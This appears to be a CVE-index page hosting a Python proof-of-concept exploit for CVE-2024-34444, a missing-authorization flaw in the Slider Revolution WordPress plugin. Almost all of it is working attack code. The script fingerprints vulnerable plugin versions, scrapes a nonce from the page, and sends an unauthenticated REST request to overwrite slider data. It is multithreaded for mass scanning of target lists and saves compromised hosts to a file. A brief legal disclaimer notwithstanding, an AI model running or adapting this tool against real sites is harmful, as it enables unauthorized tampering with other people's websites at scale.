4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-34444
README.md
Rendering markdown...
POC / CVE-2024-34444
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2024-34444 - Slider Revolution Missing Authorization
================================================================

Author: DZ Mind Injector 
Version: 1.0
Date: 2026-02-15
GitHub: https://github.com/dzmind2312

Description:
Missing Authorization vulnerability in Slider Revolution < 6.7.0
Allows unauthenticated attackers to modify slider data via REST API
without proper permission checks. Can be chained with XSS for RCE.

Legal Notice:
This tool is for authorized security testing only!
Unauthorized access is illegal. Test only on systems you own or have
explicit written permission to test.
"""

import requests
import re
import argparse
import sys
import time
from concurrent.futures import ThreadPoolExecutor
import urllib3
from rich.console import Console
from rich.panel import Panel
from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn
from rich.table import Table
from rich import box

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

VERSION = "1.0"
AUTHOR = "DZ Mind Injector"
console = Console()

class CVE202434444:
    def __init__(self, target, verbose=False):
        self.target = target.rstrip('/')
        self.session = requests.Session()
        self.session.verify = False
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
        })
        self.nonce = None
        self.verbose = verbose
        
    def log(self, message, style="cyan"):
        """Log verbose messages"""
        if self.verbose:
            console.print(f"[{style}][*][/{style}] {message}")
    
    def extract_nonce(self):
        """Extract revslider_actions nonce from WordPress frontend"""
        self.log(f"Extracting nonce from {self.target}...")
        try:
            r = self.session.get(self.target, timeout=10)
            
            patterns = [
                r'revslider_actions["\']?\s*:\s*["\']([a-f0-9]+)["\']',
                r'"nonce":\s*"([a-f0-9]+)"',
                r'var\s+revslider_nonce\s*=\s*["\']([a-f0-9]+)["\']',
                r'revslider["\']?\s*:\s*{\s*["\']nonce["\']?\s*:\s*["\']([a-f0-9]+)["\']'
            ]
            
            for pattern in patterns:
                match = re.search(pattern, r.text, re.IGNORECASE)
                if match:
                    self.nonce = match.group(1)
                    self.log(f"Nonce found: {self.nonce[:20]}...", "green")
                    return True
                    
        except Exception as e:
            self.log(f"Nonce extraction error: {str(e)[:50]}", "red")
        return False
    
    def check_plugin_version(self):
        """Check if vulnerable Slider Revolution version exists"""
        self.log("Checking plugin version...")
        paths = [
            '/wp-content/plugins/revslider/readme.txt',
            '/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js'
        ]
        
        for path in paths:
            try:
                r = self.session.get(f"{self.target}{path}", timeout=5)
                if r.status_code == 200:
                    version_match = re.search(r'Stable tag:\s*([\d\.]+)', r.text)
                    if version_match:
                        version = version_match.group(1)
                        if self.compare_version(version, "6.7.0") < 0:
                            self.log(f"Vulnerable version detected: {version}", "yellow")
                            return version
                        else:
                            self.log(f"Patched version: {version}", "green")
                            return None
                    return "unknown"
            except:
                continue
        return None
    
    def compare_version(self, v1, v2):
        """Compare two version strings"""
        try:
            v1_parts = [int(x) for x in v1.split('.')]
            v2_parts = [int(x) for x in v2.split('.')]
            
            for i in range(max(len(v1_parts), len(v2_parts))):
                p1 = v1_parts[i] if i < len(v1_parts) else 0
                p2 = v2_parts[i] if i < len(v2_parts) else 0
                if p1 < p2:
                    return -1
                elif p1 > p2:
                    return 1
            return 0
        except:
            return 0
    
    def exploit_update_slider(self):
        """Exploit missing authorization to update slider data"""
        if not self.nonce:
            self.log("Missing nonce, cannot exploit", "red")
            return False
        
        endpoint = f"{self.target}/wp-json/revslider/v1/slider/save"
        
        payload = {
            "slider_id": 1,
            "title": f"Security Test - CVE-2024-34444",
            "htmltag": "<div>PoC Test</div>",
            "nonce": self.nonce
        }
        
        headers = {
            'Content-Type': 'application/json'
        }
        
        try:
            self.log("Sending exploit payload...", "magenta")
            r = self.session.post(endpoint, json=payload, headers=headers, timeout=10)
            
            if r.status_code == 200:
                try:
                    response_data = r.json()
                    if response_data.get('success') or 'updated' in r.text.lower():
                        self.log("Slider modification successful!", "bold green")
                        return True
                except:
                    if 'success' in r.text.lower() or 'updated' in r.text.lower():
                        return True
            
            self.log(f"Exploit failed: HTTP {r.status_code}", "red")
                
        except Exception as e:
            self.log(f"Exploit error: {str(e)[:50]}", "red")
        
        return False
    
    def run_exploit(self):
        """Full exploit chain"""
        version = self.check_plugin_version()
        
        if not version:
            return {"status": "not_found", "target": self.target}
        
        if version != "unknown" and self.compare_version(version, "6.7.0") >= 0:
            return {"status": "patched", "target": self.target, "version": version}
        
        if not self.extract_nonce():
            return {"status": "no_nonce", "target": self.target, "version": version}
        
        if self.exploit_update_slider():
            return {
                "status": "vulnerable",
                "target": self.target,
                "version": version,
                "nonce": self.nonce
            }
        
        return {"status": "failed", "target": self.target, "version": version}

def print_banner():
    """Display professional DZ Mind Injector banner"""
    banner = """
[bold cyan]🔥 CVE-2024-34444 Slider Revolution 🔥[/bold cyan]

[bold red]██████╗ ███████╗    ███╗   ███╗██╗███╗   ██╗██████╗     ██╗███╗   ██╗     ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗ 
██╔══██╗╚══███╔╝    ████╗ ████║██║████╗  ██║██╔══██╗    ██║████╗  ██║     ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗
██║  ██║  ███╔╝     ██╔████╔██║██║██╔██╗ ██║██║  ██║    ██║██╔██╗ ██║     ██║█████╗  ██║        ██║   ██║   ██║██████╔╝
██║  ██║ ███╔╝      ██║╚██╔╝██║██║██║╚██╗██║██║  ██║    ██║██║╚██╗██║██   ██║██╔══╝  ██║        ██║   ██║   ██║██╔══██╗
██████╔╝███████╗    ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝    ██║██║ ╚████║╚█████╔╝███████╗╚██████╗   ██║   ╚██████╔╝██║  ██║
╚═════╝ ╚══════╝    ╚═╝     ╚═╝╚═╝╚═╝  ╚═══╝╚═════╝     ╚═╝╚═╝  ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝   ╚═╝    ╚═════╝ ╚═╝  ╚═╝[/bold red]

[bold white]https://github.com/dzmind2312[/bold white]

[yellow]CVE-2024-34444 - Slider Revolution Missing Authorization[/yellow]
[dim]Author: {author} | Version: {version} | [/dim]
    """.format(author=AUTHOR, version=VERSION)
    
    console.print(Panel(banner, box=box.DOUBLE_EDGE, border_style="bright_blue"))

def exploit_target(target, verbose):
    """Wrapper for threading"""
    scanner = CVE202434444(target, verbose)
    return scanner.run_exploit()

def display_results(results):
    """Display results in professional table"""
    vulnerable = [r for r in results if r['status'] == 'vulnerable']
    patched = [r for r in results if r['status'] == 'patched']
    not_found = [r for r in results if r['status'] == 'not_found']
    failed = [r for r in results if r['status'] in ['no_nonce', 'failed']]
    
    # Summary table
    summary = Table(title="[bold cyan]Scan Summary[/bold cyan]", box=box.ROUNDED)
    summary.add_column("Status", style="cyan", justify="center")
    summary.add_column("Count", style="magenta", justify="center")
    summary.add_column("Percentage", style="green", justify="center")
    
    total = len(results)
    summary.add_row("🎯 Vulnerable", str(len(vulnerable)), f"{len(vulnerable)/total*100:.1f}%")
    summary.add_row("✅ Patched", str(len(patched)), f"{len(patched)/total*100:.1f}%")
    summary.add_row("❌ Not Found", str(len(not_found)), f"{len(not_found)/total*100:.1f}%")
    summary.add_row("⚠️  Failed", str(len(failed)), f"{len(failed)/total*100:.1f}%")
    
    console.print("\n")
    console.print(summary)
    
    # Vulnerable targets table
    if vulnerable:
        vuln_table = Table(title="[bold red]🔥 VULNERABLE TARGETS[/bold red]", box=box.HEAVY_EDGE)
        vuln_table.add_column("Target", style="red")
        vuln_table.add_column("Version", style="yellow")
        vuln_table.add_column("Nonce", style="dim")
        
        for result in vulnerable:
            vuln_table.add_row(
                result['target'],
                result.get('version', 'unknown'),
                result.get('nonce', 'N/A')[:20] + "..."
            )
        
        console.print("\n")
        console.print(vuln_table)

def main():
    parser = argparse.ArgumentParser(
        description='CVE-2024-34444 Slider Revolution Professional ',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python3 exploit.py -u https://target.com
  python3 exploit.py -l targets.txt -t 20 -v
  python3 exploit.py -l sites.txt -t 50 -o results.txt
        """
    )
    
    parser.add_argument('-u', '--url', help='Single target URL')
    parser.add_argument('-l', '--list', help='File with list of targets')
    parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
    parser.add_argument('-o', '--output', help='Output file for vulnerable targets')
    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
    
    args = parser.parse_args()
    
    print_banner()
    
    if not args.url and not args.list:
        console.print("[red][!] Error: Specify target with -u or -l[/red]")
        console.print("[yellow]Usage: python3 exploit.py -u https://target.com [-t 10] [-l targets.txt] [-v][/yellow]")
        sys.exit(1)
    
    # Load targets
    targets = []
    if args.url:
        targets.append(args.url)
    if args.list:
        try:
            with open(args.list, 'r') as f:
                targets.extend([line.strip() for line in f if line.strip()])
        except FileNotFoundError:
            console.print(f"[red][-] File not found: {args.list}[/red]")
            sys.exit(1)
    
    console.print(f"\n[cyan][*] Loaded {len(targets)} target(s)[/cyan]")
    console.print(f"[cyan][*] Threads: {args.threads}[/cyan]")
    console.print(f"[cyan][*] Verbose: {args.verbose}[/cyan]\n")
    
    # Scan with progress bar
    results = []
    
    with Progress(
        SpinnerColumn(),
        TextColumn("[progress.description]{task.description}"),
        BarColumn(),
        TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        console=console
    ) as progress:
        
        task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
        
        with ThreadPoolExecutor(max_workers=args.threads) as executor:
            futures = {executor.submit(exploit_target, target, args.verbose): target for target in targets}
            
            for future in futures:
                result = future.result()
                results.append(result)
                progress.advance(task)
                
                # Real-time status
                if result['status'] == 'vulnerable':
                    console.print(f"[bold green][+] VULN: {result['target']}[/bold green]")
                elif args.verbose and result['status'] == 'patched':
                    console.print(f"[green][ ] Patched: {result['target']}[/green]")
    
    # Display results
    display_results(results)
    
    # Save to file
    if args.output:
        vulnerable = [r for r in results if r['status'] == 'vulnerable']
        with open(args.output, 'w') as f:
            for result in vulnerable:
                f.write(f"{result['target']}\t{result.get('version', 'unknown')}\t{result.get('nonce', 'N/A')}\n")
        console.print(f"\n[green][+] Results saved to {args.output}[/green]")
    
    console.print(f"\n[bold cyan]🎯 Scan completed! Found {len([r for r in results if r['status'] == 'vulnerable'])} vulnerable target(s)[/bold cyan]\n")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        console.print("\n[red][!] Scan interrupted by user[/red]")
        sys.exit(0)